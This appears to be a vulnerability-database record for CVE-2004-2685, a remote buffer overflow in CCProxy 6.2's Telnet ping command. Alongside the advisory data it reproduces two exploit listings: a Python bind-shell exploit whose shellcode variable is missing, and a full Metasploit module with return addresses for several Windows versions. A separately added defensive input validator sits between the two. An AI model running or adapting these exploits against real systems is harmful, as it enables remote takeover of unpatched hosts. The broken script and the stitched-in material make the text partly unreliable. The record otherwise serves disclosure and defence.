CVE-2004-2685
CVSS 7.5
Published: 2004-12-31 00:00:00
Revised: 2008-09-05 16:44:50

[Original] Buffer overflow in YoungZSoft CCProxy 6.2 and earlier allows remote attackers to execute arbitrary code via a long address in a ping (p) command to the Telnet proxy service, a different vector than CVE-2004-2416.


[CNNVD] Youngzsoft CCProxy Buffer Overflow Vulnerability (CNNVD-200412-1009)

YoungZSoft CCProxy 6.2 and earlier versions contain a buffer overflow vulnerability. A remote attacker can execute arbitrary code via an overly long address in the ping (p) command of the Telnet proxy service; this vector differs from CVE-2004-2416.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: NETWORK [the attacker needs neither intranet nor local access]
Authentication: NONE [exploitation requires no authentication]

- CWE (weakness category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2685
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2685
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-1009
(Official data source) CNNVD

- Other links and resources

http://www.youngzsoft.net/ccproxy/whatsnew.htm
(UNKNOWN)  MISC  http://www.youngzsoft.net/ccproxy/whatsnew.htm
http://www.milw0rm.com/exploits/621
(UNKNOWN)  MILW0RM  621
http://www.milw0rm.com/exploits/4360
(UNKNOWN)  MILW0RM  4360
http://secunia.com/advisories/13085
(VENDOR_ADVISORY)  SECUNIA  13085

- Vulnerability information

Youngzsoft CCProxy Buffer Overflow Vulnerability
High severity  Buffer overflow
2004-12-31 00:00:00 2007-09-07 00:00:00
Remote
YoungZSoft CCProxy 6.2 and earlier versions contain a buffer overflow vulnerability. A remote attacker can execute arbitrary code via an overly long address in the ping (p) command of the Telnet proxy service; this vector differs from CVE-2004-2416.

- Advisories and patches


- Vulnerability information (621)

CCProxy 6.2 (ping) Remote Buffer Overflow Exploit (EDBID:621)
windows remote
2004-11-10 Verified
23 KaGra
######################################################################
##  |------------------------------------------------------------|  ##
##  |    CCProxy 6.2 ping Remote Buffer Overflow Exploit         |  ##  
##  |      Based on Ruder's discovery,exploit by KaGra           |  ##  
##  |   Binds Shellcode aT 101,use netcat to connect back...     |  ##
##  |            Tested in WinXP SP1 EnGlish                     |  ##
##  |       Greedingz to:NinA,Coderz.gr and my musik BanD        |  ##
##  |------------------------------------------------------------|  ##
######################################################################

# Usage:exploit.py|nc Host port,where port is the telnet service of the target
# The buG exists when a long parameter is passed to ping command in telnet
# service of CCproxy server.This is a classic stack based overflow.Ret address
# is close to ESI,so a JMP ESI will do the trick.Other nops are just for padding...
#
#
#C:\exploit.py|nc localhost 23
#
#C:\nc -v localhost 101
#
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
#
#C:\Documents and Settings\xcv>

import struct

#BinD ShellCode aT PorT 101,taken from  muts exploit,thankz pul...



buffer = '\x90'*605         # The usual nops... 

RETADDR="\xc7\x41\xe6\x77"  # JMP ESI In XP SP1 EnGliSH...

buff2='\x90'*8              # padding...

print "ping "+buffer+sc2+RETADDR+buff2 # DeaD...

// milw0rm.com [2004-11-10]
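Added example, not part of this record or of either exploit listing: a proxy-side validator for the Telnet ping command argument, written in Python 3 from a defender's view of the bug above (the server copied the address into a fixed stack buffer with no length check). The 253/63-byte hostname bounds and the accept/reject policy are assumptions, not CCProxy's actual fix.

```python
import re

# Added example (assumption: the proxy validates the 'p'/'ping' argument
# before copying it anywhere). CVE-2004-2685 exists because the Telnet proxy
# copied the address argument into a fixed stack buffer unchecked.

MAX_HOST_LEN = 253   # RFC 1035 hostname limit, used here as the policy bound
MAX_LABEL_LEN = 63
_LABEL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def parse_command(line):
    """Split one proxy command line into (verb, argument), verb lower-cased."""
    parts = line.rstrip("\r\n").split(None, 1)
    if not parts:
        return "", ""
    return parts[0].lower(), (parts[1] if len(parts) > 1 else "")


def is_safe_ping_target(arg):
    """True only for a bounded, printable, well-formed hostname or IPv4 literal.
    NOP sleds or any non-ASCII/control bytes fail before reaching a buffer."""
    if not arg or len(arg) > MAX_HOST_LEN:
        return False
    if any(ord(c) < 0x20 or ord(c) > 0x7E for c in arg):
        return False
    return all(len(label) <= MAX_LABEL_LEN and _LABEL_RE.match(label)
               for label in arg.split("."))


def triage_line(line):
    """'ok' / 'reject' for ping commands, 'other' for anything else."""
    verb, arg = parse_command(line)
    if verb not in ("p", "ping"):
        return "other"
    return "ok" if is_safe_ping_target(arg) else "reject"


# Constructed sample lines (not captured traffic); the fourth has the shape of
# the milw0rm 621 payload: 'ping ' followed by a 605-byte NOP sled.
SAMPLE_LINES = [
    "ping www.example.com\r\n",
    "p 192.0.2.10\r\n",
    "help\r\n",
    "ping " + "\x90" * 605 + "\r\n",
    "p " + "A" * 1024 + "\r\n",
]


def triage_all(lines=SAMPLE_LINES):
    return [triage_line(l) for l in lines]
```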

- Vulnerability information (4360)

CCProxy <= v6.2 Telnet Proxy Ping Overflow Exploit (meta) (EDBID:4360)
windows remote
2007-09-03 Verified
0 Patrick Webster
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/ 
##

require 'msf/core'

module Msf

class Exploits::Windows::Proxy::CCProxy_Telnet_Ping < Msf::Exploit::Remote
	
	include Exploit::Remote::Tcp

	def initialize(info = {}) 
		super(update_info(info,    
			'Name'		=> 'CCProxy <= v6.2 Telnet Proxy Ping Overflow',
			'Description'	=> %q{
				This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet service.
				The stack is overwritten when sending an overly long address to the 'ping' command.
			},
			'Author' 	=> [ 'Patrick Webster <patrick[at]aushack.com>' ],
			'Arch'		=> [ ARCH_X86 ], 
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision$',
			'References'    =>
			[
				[ 'BID', '11666' ],
				[ 'CVE', '2004-2416' ],
				[ 'MIL', '621' ],
				[ 'OSVDB', '11593' ],
			],         
			'Privileged'		=> false,
			'DefaultOptions'	=>
			{
				'EXITFUNC' 	=> 'thread',
			},
			'Payload' =>
				{ 
					'Space'		=> 1012,
					'BadChars' 	=> "\x00\x07\x08\x0a\x0d",
				},
			'Platform' => ['win'],
			'Targets' =>
			[
			# Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.
				[
				'Windows 2000 Pro All - English',
				{
					'Ret'	=> 0x75023411, # call esi ws2help.dll
				}
				],
				[
				'Windows 2000 Pro All - Italian',
				{
					'Ret'	=> 0x74fd2b81, # call esi ws2help.dll
				}
				],
				[
				'Windows 2000 Pro All - French',
				{
					'Ret'	=> 0x74fa2b22, # call esi ws2help.dll
				}
				],
				[
				'Windows XP SP0/1 - English',
				{
					'Ret'	=> 0x71aa1a97, # call esi ws2help.dll
				}
				],
				[
				'Windows XP SP2 - English',
				{
					'Ret'	=> 0x71aa1b22, # call esi ws2help.dll
				}
				],
			],
			'DisclosureDate' => 'Nov 11 2004'))
			register_options(
			[
				Opt::RPORT(23),
			], self.class)
	end

	def autofilter
		false
	end

	def check 
		connect
		banner = sock.get_once(-1,3)

		if (banner =~ /CCProxy Telnet Service Ready/)
			return Exploit::CheckCode::Appears 
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect
		
		sploit  = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)
		sock.put(sploit + "\r\n")

		handler
		disconnect
	end

end
end

# milw0rm.com [2007-09-03]

- Vulnerability information

45824
CCProxy Telnet Proxy Service Ping Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

2004-11-10 Unknown
Unknown Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete